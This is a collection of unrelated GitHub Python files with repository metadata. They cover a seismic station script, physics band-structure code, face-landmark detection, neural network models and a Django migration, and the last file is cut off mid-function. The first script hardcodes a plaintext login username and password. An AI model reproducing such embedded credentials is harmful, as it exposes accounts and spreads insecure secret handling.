dddc102451650e8c1246a72751a2e42c806265f0
|
5149eca42f04316a9a13ce1a6e1307cb70dd3fcc
|
/GainProb/Hinet_Gain/AveLocation.py
|
a734ad80d33c55b49b0935c5066d192cc2c7f3f2
|
[] |
no_license
|
VioletaSeo/earthquake
|
f720d6d33d78c6e7d1b1661e36f64bdf6a90d0da
|
1527b2b40cb8f7de3169ede1f1f2807b8616305c
|
refs/heads/master
| 2020-09-12T00:38:57.133971
| 2020-04-03T08:57:30
| 2020-04-03T08:57:30
| 222,243,668
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 523
|
py
|
# Compute the average location of all HiNet stations (latitude, longitude) in degrees
from HinetPy import Client

client = Client("msseo97", "minseong97")  # User login
stations = client.get_station_list('0101')  # Get all the station info of HiNet
lat_sum, long_sum, count = 0, 0, 0
for station in stations:
    lat_sum += station.latitude
    long_sum += station.longitude
    count += 1
    print(station)
lat_ave = lat_sum / count
long_ave = long_sum / count
print(f"Average Latitude: {lat_ave}")
print(f"Average Longitude: {long_ave}")
|
[
"noreply@github.com"
] |
VioletaSeo.noreply@github.com
|
1382f7c73719abbbf5b4fc5626130b4d4276b793
|
3e04762874f7284bf28073794b0aa4741b3bb5d7
|
/week4/0alfabeto.py
|
441e896fe3fd0dd687d471bcbe919ee01e4b9c82
|
[] |
no_license
|
FelipeMQ/CS1100
|
2b8b81c0ff4bb27f184498a5c8b54410da60c817
|
1c1af3773fde2d696f538c60fd0a91a956a4761b
|
refs/heads/master
| 2020-03-25T00:44:50.335643
| 2017-10-16T13:52:43
| 2017-10-16T13:52:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
alfabeto = "abcdefghijklmggggnñopqrstuvwxyz"
for caracter in alfabeto:
    if caracter == 'g':
        print('caracter g')
|
[
"randiel.melgarejo@gmc-soft.com"
] |
randiel.melgarejo@gmc-soft.com
|
ea22cbc90ac662f3653b73a10e009a8cd350a45f
|
a012ed6fd7e2ecbbb694260f82c15ab19849774a
|
/scratch.py
|
ebad8251fdd3404b24357592a60fb738023a1c40
|
[] |
no_license
|
dpiponi/nano
|
f059285a8d5adc2aaaef7bdbb4d857b228101925
|
8145a95cb7f6ba7bfe5269bf3d0abd87d5c77444
|
refs/heads/master
| 2020-05-17T15:44:16.976181
| 2018-01-11T21:57:56
| 2018-01-11T21:57:56
| 7,544,583
| 5
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,535
|
py
|
"""
Compute energy levels and band structures for atomic nanostructures
drawn with ASCII art.
"""
# 3eV for graphene
import numpy
import numpy.linalg
import matplotlib.pyplot
import math
import sys
import operator
import units
diagram = r"""
o-o
/ \
o o-o
\ / \
o-o o
/ \ /
o o-o
\ /
o-o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
\ /
o-o
"""
diagram = r"""
o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o
"""
diagram = r"""
o-o
/ \
o o
\ /
o-o
"""
diagram = r"""
o-o=o-o=o-o=o-o=o-o=o-o=o-o=o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o o-o o-o
\ / \ / \
o-o o-o o
\ / \ /
o-o o-o
\ /
o-o
"""
diagram = r"""
A-o
/ \
C-o A
/ \
E-o C
\
E
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
"""
diagram = r"""
o-o
/ \
A o-A
\ /
B-o B
\ /
o-o
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
/ \
B o-B
\ /
o-o
"""
diagram = r"""
A-B
/ \
o o
\ /
A B
"""
diagram = r"""
A-B C-D
/ \ / \
o o-o o
\ / \ /
A B C D
"""
diagram = r"""
A-B C-D E-F G-H
/ \ / \ / \ / \
o o-o o-o o-o o
\ / \ / \ / \ /
A B C D E F G H
"""
diagram = r"""
A-B C-D E-F G-H I-J
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
o-o o-o o-o o-o o-o
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
A B C D E F G H I J
"""
diagram = r"""
A-B C-D E-F G-H I-J
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
A B C D E F G H I J
"""
diagram = r"""
A-B C-D E-F G-H I-J
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ /
o-o o-o o-o o-o
/ \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
A B C D E F G H I J
"""
diagram = r"""
A-B C-D E-F
/ \ / \ / \
o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o
\ / \ / \ /
A B C D E F
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
/ \
C o-C
\ /
D-o D
\ /
o-o
"""
diagram = r"""
o-o
/ \
o o-o
\ / \
o-o o
\ /
o-o
"""
diagram = r"""
o-o-o-o
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
/ \
C o-C
\ /
D-o D
\ /
o-o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
\ /
o-o
"""
diagram = r"""
A
|
o o
/ \ / \
o o o
| | |
o o o
\ / \ /
A o
"""
diagram = r"""
A B
| |
o o o o o
/ \ / \ / \ / \ / \
o o o o o o
| | | | | |
o o o o o o
\ / \ / \ / \ / \ /
o A o B o
"""
diagram = r"""
A F
/ \
o o-o o-o
\ / \ \
o-o o-o o-o o-o
\ \ / \ \
o-o o-o o-o o-o
\ \ \ / \
o-o o-o o-o o-o
\ / \ / \
o-o o-o o
\ /
A F
"""
diagram = r"""
A-B C
/ \ /
o o-o
\ / \
A B C
"""
diagram = r"""
o-o=o-o=o-o=o-o=o-o=o-o=o-o=o
"""
ZIGZAG1 = r"""
A-B
/ \
o o
\ /
A B
"""
ZIGZAG2 = r"""
A-B C
/ \ /
o o-o
\ / \
A B C
"""
ZIGZAG5 = r"""
A-B C-D E-F
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
A B C D E F
"""
ARMCHAIR1 = r"""
A B
| |
o o
\ /
o
|
o
/ \
A B
"""
ARMCHAIR2 = r"""
A B
| |
o o
\ / \
o o
| |
o o
/ \ /
A B
"""
ARMCHAIR3 = r"""
A B C
| | |
o o o
\ / \ /
o o
| |
o o
/ \ / \
A B C
"""
BEARDED_ZIGZAG2 = r"""
A-B C
/ \ /
o-o o-o
\ / \
A B C
"""
BEARDED_BEARDED5 = r"""
A-B C-D E-F
/ \ / \ / \
o-o o-o o-o o-o
\ / \ / \ /
A B C D E F
"""
INTERFACE = r"""
o-o=o-o=o-o=o-o=o=o-o=o-o=o-o=o
"""
GRID23 = r"""
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
"""
GRID35 = r"""
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
\ / \ /
o-o o-o
"""
SIMPLE1 = r"""
A-B
| |
A B
"""
SIMPLE2 = r"""
A-B
| |
o-o
| |
A B
"""
MANY = r"""
A-B-C-D-E-F-G-H-I-J-K-L-M-N-O-P-Q-R-S-T-U-V-W-X-Y-Z-a-b-c-d-e-f
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f
"""
#import console
numpy.set_printoptions(linewidth=200)
def vec(x, y):
"""
Construct 2D numpy integer vector.
This type is used for representing vectors within a nano-ribbon
diagram.
"""
return numpy.array([x, y], dtype = numpy.int32)
bond_types = {
'/' : (1.0, vec(1, -1), vec(-1, 1)),
'\\': (1.0, vec(-1, -1), vec(1, 1)),
'-' : (1.0, vec(0, -1), vec(0, 1)),
'=' : (1.5, vec(0, -1), vec(0, 1)),
'|' : (1.0, vec(-1, 0), vec(1, 0))
}
def parse_diagram(diagram, dimension_hint = None, joins = ''):
"""
Convert diagram into lists of bonds and atoms.
This function attempts to guess whether your diagram is aperiodic,
periodic with one period or periodic with two periods.
It does this using the geometry of the diagram, assuming it
is planar. Sometimes you don't want planar geometry
(eg. for spirals) and you simply want a single period.
In that case, set `dimension_hint` equal to 1. It's a hint
because it'll return an aperiodic structure if that's what
your diagram looks like.
"""
p = diagram.split('\n')
num_atoms = 0
dimension = 0
period0 = None
period1 = None
atoms = {}
bonds = []
orig_map = {}
i = 0
for row in p:
j = 0
for col in row:
if col in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnpqrstuvwxyz':
if col in orig_map:
if col in joins:
orig = orig_map[col]
path = vec(0, 0)
else:
orig = orig_map[col]
d = vec(i-orig[0], j-orig[1])
if dimension_hint == 1 or dimension == 0:
period0 = d
path = vec(1, 0)
dimension = 1
elif dimension == 1:
if (period0==d).all():
path = vec(1, 0)
else:
period1 = d
dimension = 2
path = vec(0, 1)
elif dimension == 2:
if (period0 == d).all():
path = vec(0, 1)
elif (period1 == d).all():
path = vec(1, 0)
elif (period0+period1 == d).all():
path = vec(1, 1)
else:
raise "Unknown period"
atoms[(i, j)] = (path, atoms[orig_map[col]][1])
else:
orig_map[col] = (i, j)
atoms[(i, j)] = (vec(0, 0), num_atoms)
num_atoms += 1
elif col == 'o':
atoms[(i, j)] = (vec(0, 0), num_atoms)
num_atoms += 1
elif col in bond_types:
(hop, src, dst) = bond_types[col]
bonds.append((hop, (i+src[0], j+src[1]), (i+dst[0], j+dst[1])))
j += 1
i += 1
return (num_atoms, dimension, bonds, atoms)
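# Example of the guessing described above (a sketch; ZIGZAG1 is defined earlier
# in this file, and its repeated A/B labels mark one lattice period):
# num_atoms, dimension, bonds, atoms = parse_diagram(ZIGZAG1)
# assert dimension == 1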
def compute_hamiltonian(num_atoms, atoms, bonds, flux_per_plaquette = 0):
"""
Compute Hamiltonian for given graph.
If it's periodic it computes the Hamiltonian as a polynomial
in the reciprocal lattice vector.
"""
zero = numpy.zeros((num_atoms, num_atoms),
dtype = numpy.complex64)
h_poly = {}
for (w, (i0, j0), (i1, j1)) in bonds:
(phase0, atom0) = atoms[(i0, j0)]
(phase1, atom1) = atoms[(i1, j1)]
exp0 = phase1[0]-phase0[0]
exp1 = phase1[1]-phase0[1]
if not (exp0, exp1) in h_poly:
h_poly[( exp0, exp1)] = numpy.copy(zero)
h_poly[(-exp0, -exp1)] = numpy.copy(zero)
# print "a-a ((",atom0, atom1,"))"
# print (i0,j0),"->",(i1,j1)
plaquettes = 0.5*(i1-i0)*(j0+j1)
# print "plaquettes=",plaquettes
mag_angle = flux_per_plaquette*plaquettes*units.electron_charge/units.hbar
mag_phase = numpy.exp(1j*mag_angle)
# print "area=",area
# print "magangle=",mag_angle
# print "magphase",w,mag_phase
# print "exp0,exp1=",exp0,exp1
h_poly[( exp0, exp1)][atom0, atom1] += w*mag_phase
h_poly[(-exp0, -exp1)][atom1, atom0] += w/mag_phase
# print h_poly
return h_poly
def eval_hamiltonian(num_atoms, h_poly, (phase0, phase1)):
"""
Evaluate the Hamiltonian given as a polynomial for a
particular choice of reciprocal lattice vector.
"""
# print "phase=",(phase0, phase1)
h = numpy.zeros((num_atoms, num_atoms),
dtype = numpy.complex64)
for (exp0, exp1) in h_poly:
# print phase0, phase1, exp0, exp1
h += h_poly[(exp0, exp1)] * phase0**exp0 * phase1**exp1
return h
def eigensystem(mat):
"""
Compute eigenvalues and eigenvectors of matrix with
results sorted in increasing order of eigenvalue.
"""
e, v = numpy.linalg.eig(mat)
# `eig` returns complex results but we know all of the
# eigenstates have real energy.
e = numpy.real(e)
items = zip(e, v.T)
items = sorted(items, key = operator.itemgetter(0))
e, v = zip(*items)
return (e, v)
def display_band_structure_1d(num_atoms, h_poly, cycles = 1, phase_offset = 0):
"""
Display band structure on the 1d Brillouin zone.
The following parameters affect only how the result is displayed:
`cycles` is the number of times we wrap one brillouin zone around the
horizontal axis. Simulates the effect of computing bands where the
fundamental domain has been repeated `cycles` times.
`phase_offset` shifts the graph in phase space.
"""
x = []
y = [[] for i in range(num_atoms)]
n = 100*cycles
for k in range(-n/2, n/2):
# for k in range(0, n):
alpha = 2*math.pi*k/n+phase_offset
phase = numpy.exp(alpha*1j)
#h_minus, h_zero, h_plus = compute_hamiltonian(num_atoms, atoms, bonds)
#h = h_minus*phase.conjugate()+h_zero+h_plus*phase
h = eval_hamiltonian(num_atoms, h_poly, (phase, 1))
e, v = eigensystem(h)
#print k,h,e
x.append(alpha)
for i in range(num_atoms):
y[i].append(e[i])
for i in range(num_atoms):
# matplotlib.pyplot.plot(x, y[i])
for cycle in range(0, cycles):
matplotlib.pyplot.plot(x[0:100], y[i][100*cycle:100*(cycle+1)])
# matplotlib.pyplot.show()
def simple_display_energy_levels_0d(diagram, num_atoms, atoms, h_poly):
"""
Display energy levels for 0d nano-structure.
Also show eigenstates.
"""
h = eval_hamiltonian(num_atoms, h_poly, (1, 1))
e, v = eigensystem(h)
print e
matplotlib.pyplot.scatter(num_atoms*[0], e, s = 20, marker = '_')
def display_energy_levels_0d(diagram, num_atoms, atoms, h_poly):
"""
Display energy levels for 0d nano-structure.
Also show eigenstates.
"""
h = eval_hamiltonian(num_atoms, h_poly, (1, 1))
e, v = eigensystem(h)
left = 0
bottom = 0
right = max([len(row) for row in diagram.split('\n')])
top = len(diagram.split('\n'))
plot_rows = numpy.ceil(math.sqrt(num_atoms+1))
plot_cols = plot_rows
for i in range(num_atoms):
matplotlib.pyplot.subplot(plot_rows, plot_cols, i+1, axisbg="#000000")
y = [atom[0] for atom in atoms]
x = [atom[1] for atom in atoms]
c = numpy.abs(v[i]*v[i])
matplotlib.pyplot.title('E = %f' % numpy.real(e[i]), fontsize = 10)
norm = matplotlib.colors.Normalize(vmin = min(c),
vmax = max(0.0001, max(c)))
#x = [0,0,1,1]
#y = [0,1,0,1]
#c = [1,2,3,4]
matplotlib.pyplot.hexbin(x, y, C = c,
gridsize = (right-left, top-bottom),
extent = (left, right, bottom, top),
cmap = matplotlib.pyplot.get_cmap("gray"),
norm = norm
)
matplotlib.pyplot.subplot(plot_rows, plot_cols, num_atoms+1)
matplotlib.pyplot.scatter(num_atoms*[0], e, s = 0.1)
def main():
#diagram = BEARDED_ZIGZAG2
#diagram = ZIGZAG2
#diagram = BEARDED_BEARDED5
diagram = MANY
b = 0#0.033*math.pi/2/4
num_atoms, dimension, bonds, atoms = parse_diagram(diagram)
print "dimension=", dimension
if dimension==2:
if 0:
n = 100
x = numpy.zeros((n, n), dtype = numpy.float64)
y = numpy.zeros((num_atoms, n, n), dtype = numpy.float64)
for k0 in range(-n/2, n/2):
for k1 in range(-n/2, n/2):
alpha0 = 2*math.pi*k0/n
alpha1 = 2*math.pi*k1/n
phase0 = numpy.exp(alpha0*1j)
phase1 = numpy.exp(alpha1*1j)
h_minus, h_zero, h_plus = compute_hamiltonian(num_atoms, atoms, bonds)
h = h_minus*phase.conjugate()+h_zero+h_plus*phase
e, v = eigensystem(h)
x.append(alpha)
for i in range(num_atoms):
y[i].append(e[i])
for i in range(num_atoms):
matplotlib.pyplot.plot(x, y[i], lod = True)
matplotlib.pyplot.show()
elif dimension == 1:
h_poly = compute_hamiltonian(num_atoms, atoms, bonds, b)
h = eval_hamiltonian(num_atoms, h_poly, (1, 1))
# print h
#sys.exit(1)
display_band_structure_1d(num_atoms, h_poly)
elif dimension==0:
h_poly = compute_hamiltonian(num_atoms, atoms, bonds)
display_energy_levels_0d(diagram, num_atoms, atoms, h_poly)
if __name__ == "__main__":
main()
|
[
"dpiponi@gmail.com"
] |
dpiponi@gmail.com
|
7e812132e7cf725bce5dd9ec1126147adaf1cb97
|
94a766caa58ce5a9619bc7f99c6dceb961211b2a
|
/pi-face-recognition/dots.py
|
10b52a02295afca465a2b0aacd21961c2746b47b
|
[] |
no_license
|
n-nicholas-s/Toddler-Companion-Bot
|
90976294f08fceadfefbd2382fba6e8c048a3db1
|
81c8f4dc3ee5328ad5986e36b642520d2d1d1225
|
refs/heads/main
| 2023-02-27T08:33:58.554148
| 2021-02-09T10:37:19
| 2021-02-09T10:37:19
| 311,227,832
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
# Import required modules
from imutils.video import VideoStream
import imutils
import cv2
import dlib
import time

vs = VideoStream(usePiCamera=True).start()
time.sleep(2.0)

# Set up some required objects
video_capture = cv2.VideoCapture(0)  # Webcam object (unused; frames come from the VideoStream above)
detector = dlib.get_frontal_face_detector()  # Face detector
# Landmark identifier. Set the filename to whatever you named the downloaded file
predictor = dlib.shape_predictor("/home/pi/pi-face-recognition/Predict/shape_predictor_68_face_landmarks.dat")

while True:
    frame = vs.read()
    frame = imutils.resize(frame, width=500)
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
    clahe_image = clahe.apply(gray)
    detections = detector(clahe_image, 1)  # Detect the faces in the image
    for k, d in enumerate(detections):  # For each detected face
        shape = predictor(clahe_image, d)  # Get coordinates
        for i in range(68):  # There are 68 landmark points (0-67) on each face
            # For each point, draw a red circle with thickness 2 on the original frame
            cv2.circle(frame, (shape.part(i).x, shape.part(i).y), 1, (0, 0, 255), thickness=2)
    cv2.imshow("image", frame)  # Display the frame
    if cv2.waitKey(1) & 0xFF == ord('q'):  # Exit program when the user presses 'q'
        break

# Release the display window and the camera stream
cv2.destroyAllWindows()
vs.stop()
|
[
"noreply@github.com"
] |
n-nicholas-s.noreply@github.com
|
269973bf925d19675fed0e0eda03f5b215389c27
|
de86f9f9dd620212c96fc3bbc28bdbc7432aa237
|
/lib/Cond_Ex.py
|
bbe7a482982a63c49b59bf18cc8400242b9fd48e
|
[] |
no_license
|
yomhub/Tensorflow_research
|
235fa5513abeea64e44291e6705fb136cf108af4
|
2f8102039168ade5481745e4aa59c7e6a0cba59b
|
refs/heads/master
| 2022-11-24T05:08:11.009741
| 2020-06-14T01:21:54
| 2020-06-14T01:21:54
| 280,804,212
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,421
|
py
|
# utf-8
# This module implements Conditional Spatial Expansion (CSE),
# based on the paper
# "Towards Robust Curve Text Detection With Conditional Spatial Expansion".
import os, sys
import tensorflow as tf
from tensorflow.keras import layers
import numpy as np
class Cond_Pred(layers.Layer):
"""
X: input feature (chs,)
Y: possibility of direction (5,)
[button,right,left,top,stable]->BRLTS
Ho: output hidden state TO BRLT, (4,1)
Hi: input hidden state FROM CENTER and BRLT, (1+4,1)
Direction: BRLT case = 4
"""
def __init__(self, x_chs=4,direction=4):
super(Cond_Pred, self).__init__()
rd_init = tf.random_normal_initializer()
z_init = tf.zeros_initializer()
self.direction = direction
self.wc = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bc = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for gate value in BRLT
self.wgci = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bgci = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for current g in BRLT
self.wgcur = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bgcur = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for output gate in BRLT
self.wgout = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bgout = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# B for output H
self.bhout = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for Y in CENTER and BRLT
# convert c (self.direction,1) to (5,1)
self.wyout = tf.Variable(initial_value=rd_init(
shape=(5, direction),
dtype='float32'),
trainable=True)
self.byout = tf.Variable(initial_value=z_init(
shape=(5, 1),
dtype='float32'),
trainable=True)
# self.cin = tf.Variable(initial_value=z_init(
# shape=(4, direction),
# dtype='float32'),
# trainable=True)
def call(self, inputs):
"""
Inputs
Xin: input feature (chs,1)
Hin = (hcenter,hb,hr,hl,ht), shape (5,self.direction)
Cin = (cbin,crin,clin,ctin), shape (4,self.direction)
Yin = (yb,yr,yl,yt) shape (4,5)
Hout shape: (self.direction)
Y possibility in direction (center,button,right,left,top), shape: (5)
Outputs
Yout = (5,1)
Hout = (self.direction,1)
Cout = (self.direction,self.direction)
"""
xin, yin, hin, cin = inputs
assert(hin.shape==(5,self.direction))
assert(cin.shape==(4,self.direction))
# s shape (chx+5*self.direction+4*5, 1)
s = tf.concat([
tf.reshape(xin,[-1]),
tf.reshape(hin,[-1]),
tf.reshape(yin,[-1]),
],
0)
s = tf.reshape(s,[-1,1])
# current candidate state, shape (self.direction,1)
cur_c = tf.tanh(tf.matmul(self.wc,s)+self.bc)
# gcin, shape (self.direction,1)
gcin = tf.sigmoid(tf.matmul(self.wgci,s)+self.bgci)
tmp = tf.zeros(cur_c.shape)
for i in range(gcin.shape[0]):
tmp += gcin[i]*tf.reduce_sum(cin[i])
# gcur shape (self.direction,1)
gcur = tf.sigmoid(tf.matmul(self.wgcur,s)+self.bgcur)
# c shape same as gcur (self.direction,self.direction)
c = tf.keras.utils.normalize(tmp+(gcur*cur_c))
# gout shape (self.direction,1)
gout = tf.sigmoid(tf.matmul(self.wgout,s)+self.bgout)
# hout shape (self.direction,1)
hout = tf.tanh(c)*gout+self.bhout
y = tf.nn.softmax(tf.matmul(self.wyout,c)+self.byout)
return y,hout,c
@tf.function
def _roi_loss():
pass
class CSE(tf.keras.Model):
def __init__(self,
feature_layer_name='vgg16',
proposal_window_size=[3,3],
max_feature_size=[30,30]
):
super(CSE, self).__init__()
# self.name='Faster_RCNN'
self.pw_size=proposal_window_size
self._predictions={}
self._loss_function=_roi_loss()
if(feature_layer_name=='vgg16'):
self.feature_layer_name=feature_layer_name
self.cond_pred_layer=Cond_Pred(x_chs=512)
elif(feature_layer_name.lower()=='resnet'):
self.feature_layer_name='resnet'
else:
self.feature_layer_name='vgg16'
if(type(max_feature_size)==list):
self.max_feature_size=max_feature_size
else:
self.max_feature_size=[int(max_feature_size),int(max_feature_size)]
def build(self,
input_shape,
):
if(self.feature_layer_name=='resnet'):
rn=tf.keras.applications.ResNet101V2()
self.feature_model = tf.keras.models.Sequential([
# vgg16.get_layer("input_1"),
rn.get_layer("conv1_pad"), rn.get_layer("conv1_conv"), rn.get_layer("pool1_pad"), rn.get_layer("pool1_pool"),
rn.get_layer("block2_conv1"), rn.get_layer("block2_conv2"), rn.get_layer("block2_pool"),
rn.get_layer("block3_conv1"), rn.get_layer("block3_conv2"), rn.get_layer("block3_conv3"),
rn.get_layer("block3_pool"),
rn.get_layer("block4_conv1"), rn.get_layer("block4_conv2"), rn.get_layer("block4_conv3"),
rn.get_layer("block4_pool"),
rn.get_layer("block5_conv1"), rn.get_layer("block5_conv2"), rn.get_layer("block5_conv3"),
rn.get_layer("block5_pool"),
],
name=self.feature_layer_name
)
else:
# default VGG16
vgg16=tf.keras.applications.VGG16(weights='imagenet', include_top=False)
self.feature_model = tf.keras.models.Sequential([
# tf.keras.Input((1024,1024,3)),
# vgg16.get_layer("input_1"),
# Original size
vgg16.get_layer("block1_conv1"), vgg16.get_layer("block1_conv2"), vgg16.get_layer("block1_pool"),
# Original size / 2
vgg16.get_layer("block2_conv1"), vgg16.get_layer("block2_conv2"), vgg16.get_layer("block2_pool"),
# Original size / 4
vgg16.get_layer("block3_conv1"), vgg16.get_layer("block3_conv2"), vgg16.get_layer("block3_conv3"),
# Original size / 4
vgg16.get_layer("block3_pool"),
# Original size / 8
vgg16.get_layer("block4_conv1"), vgg16.get_layer("block4_conv2"), vgg16.get_layer("block4_conv3"),
# Original size / 8
vgg16.get_layer("block4_pool"),
# Original size / 16
vgg16.get_layer("block5_conv1"), vgg16.get_layer("block5_conv2"), vgg16.get_layer("block5_conv3"),
# Original size / 16
# vgg16.get_layer("block5_pool"),
# Original size / 32
],
name=self.feature_layer_name
)
def call(self,inputs):
"""
Features generator->Conditional Spatial Expansion
input: image
"""
feature = self.feature_model(inputs)
# for bach in
return feature
if __name__ == "__main__":
# test_Cond_Pred = Cond_Pred()
# inp=[
# tf.zeros((4,1)),
# tf.zeros((4,5)),
# tf.zeros((5,4)),
# tf.zeros((4,4)),
# ]
# y,hout=test_Cond_Pred(inp)
test_model = CSE()
# RGB wth 256*256
inp=tf.zeros((1,256,256,3))
y = test_model(inp)
print(y.shape)
pass
|
[
"yom@yomhub.com"
] |
yom@yomhub.com
|
7571ab18bd773849dcf06b2496371d53089e95ab
|
38d86e192292e46674a58bec9e6fa1391255b10f
|
/tests/test_project/migrations/0005_organizationradiussettings.py
|
ec1bf6a6e0b6e322d42ca96ff1376ba8e477f972
|
[
"Apache-2.0",
"CC-BY-SA-4.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
openwisp/openwisp-utils
|
b8e44def6dbe9193201c89a77451da15f485c411
|
242afc8b1aa70c4691fd5b43e9ce1a3ca9eb8700
|
refs/heads/master
| 2023-08-02T11:15:42.529346
| 2023-07-26T17:21:17
| 2023-07-26T17:21:17
| 95,099,346
| 85
| 100
|
BSD-3-Clause
| 2023-09-08T13:53:57
| 2017-06-22T09:35:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,348
|
py
|
# Generated by Django 3.2.19 on 2023-06-24 15:15
from django.db import migrations, models
import openwisp_utils.fields
class Migration(migrations.Migration):
dependencies = [
('test_project', '0004_sheft_data'),
]
operations = [
migrations.CreateModel(
name='OrganizationRadiusSettings',
fields=[
(
'id',
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID',
),
),
(
'is_active',
openwisp_utils.fields.FallbackBooleanChoiceField(
blank=True, default=None, fallback=False, null=True
),
),
(
'is_first_name_required',
openwisp_utils.fields.FallbackCharChoiceField(
blank=True,
choices=[
('disabled', 'Disabled'),
('allowed', 'Allowed'),
('mandatory', 'Mandatory'),
],
fallback='disabled',
max_length=32,
null=True,
),
),
(
'greeting_text',
openwisp_utils.fields.FallbackCharField(
blank=True,
fallback='Welcome to OpenWISP!',
max_length=200,
null=True,
),
),
(
'password_reset_url',
openwisp_utils.fields.FallbackURLField(
blank=True,
fallback='http://localhost:8000/admin/password_change/',
null=True,
),
),
(
'extra_config',
openwisp_utils.fields.FallbackTextField(
blank=True, fallback='no data', max_length=200, null=True
),
),
],
),
]
|
[
"noreply@github.com"
] |
openwisp.noreply@github.com
|
263e646a2a64012dac02f0cf6f4926dfa2bc0eb6
|
de28880dd1c46d0ee2def7e46066d12185fc9a4b
|
/midinet/model.py
|
742bcb8e483d1578aa2f56628c35106154bffb80
|
[] |
no_license
|
frederictamagnan/PredictDrumFillsInNativeInstrumentsSoundPack
|
c3712987352a152edf91e893e8af1b23fd17f495
|
2a19d43d5c153340f0a7a50e7314c4763a6089a4
|
refs/heads/master
| 2020-04-10T04:16:11.417914
| 2019-04-28T16:18:51
| 2019-04-28T16:18:51
| 160,793,133
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,809
|
py
|
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import torch.optim as optim
import ipdb
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from ops import *
class sample_generator(nn.Module):
def __init__(self):
super(sample_generator, self).__init__()
self.gf_dim = 64
# self.y_dim = 13
self.n_channel = 256
pitch_range=9
self.h1 = nn.ConvTranspose2d(in_channels=144, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h2 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h3 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h4 = nn.ConvTranspose2d(in_channels=25, out_channels=1, kernel_size=(1,pitch_range), stride=(1,2))
self.h0_prev = nn.Conv2d(in_channels=1, out_channels=16, kernel_size=(1,pitch_range), stride=(1,2))
self.h1_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h2_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h3_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.linear1 = nn.Linear(100,1024*2)
self.linear2 = nn.Linear(1024*2,self.gf_dim*2*2*1)
def forward(self, z, prev_x ,batch_size,pitch_range):
# h3_prev = F.leaky_relu(self.batch_nor_256(self.h0_prev(prev_x)),0.2)
h0_prev = lrelu(batch_norm_2d_cpu(self.h0_prev(prev_x)),0.2) #[72, 16, 16, 1]
# print(h0_prev.size())
h1_prev = lrelu(batch_norm_2d_cpu(self.h1_prev(h0_prev)),0.2) #[72, 16, 8, 1]
h2_prev = lrelu(batch_norm_2d_cpu(self.h2_prev(h1_prev)),0.2) #[72, 16, 4, 1]
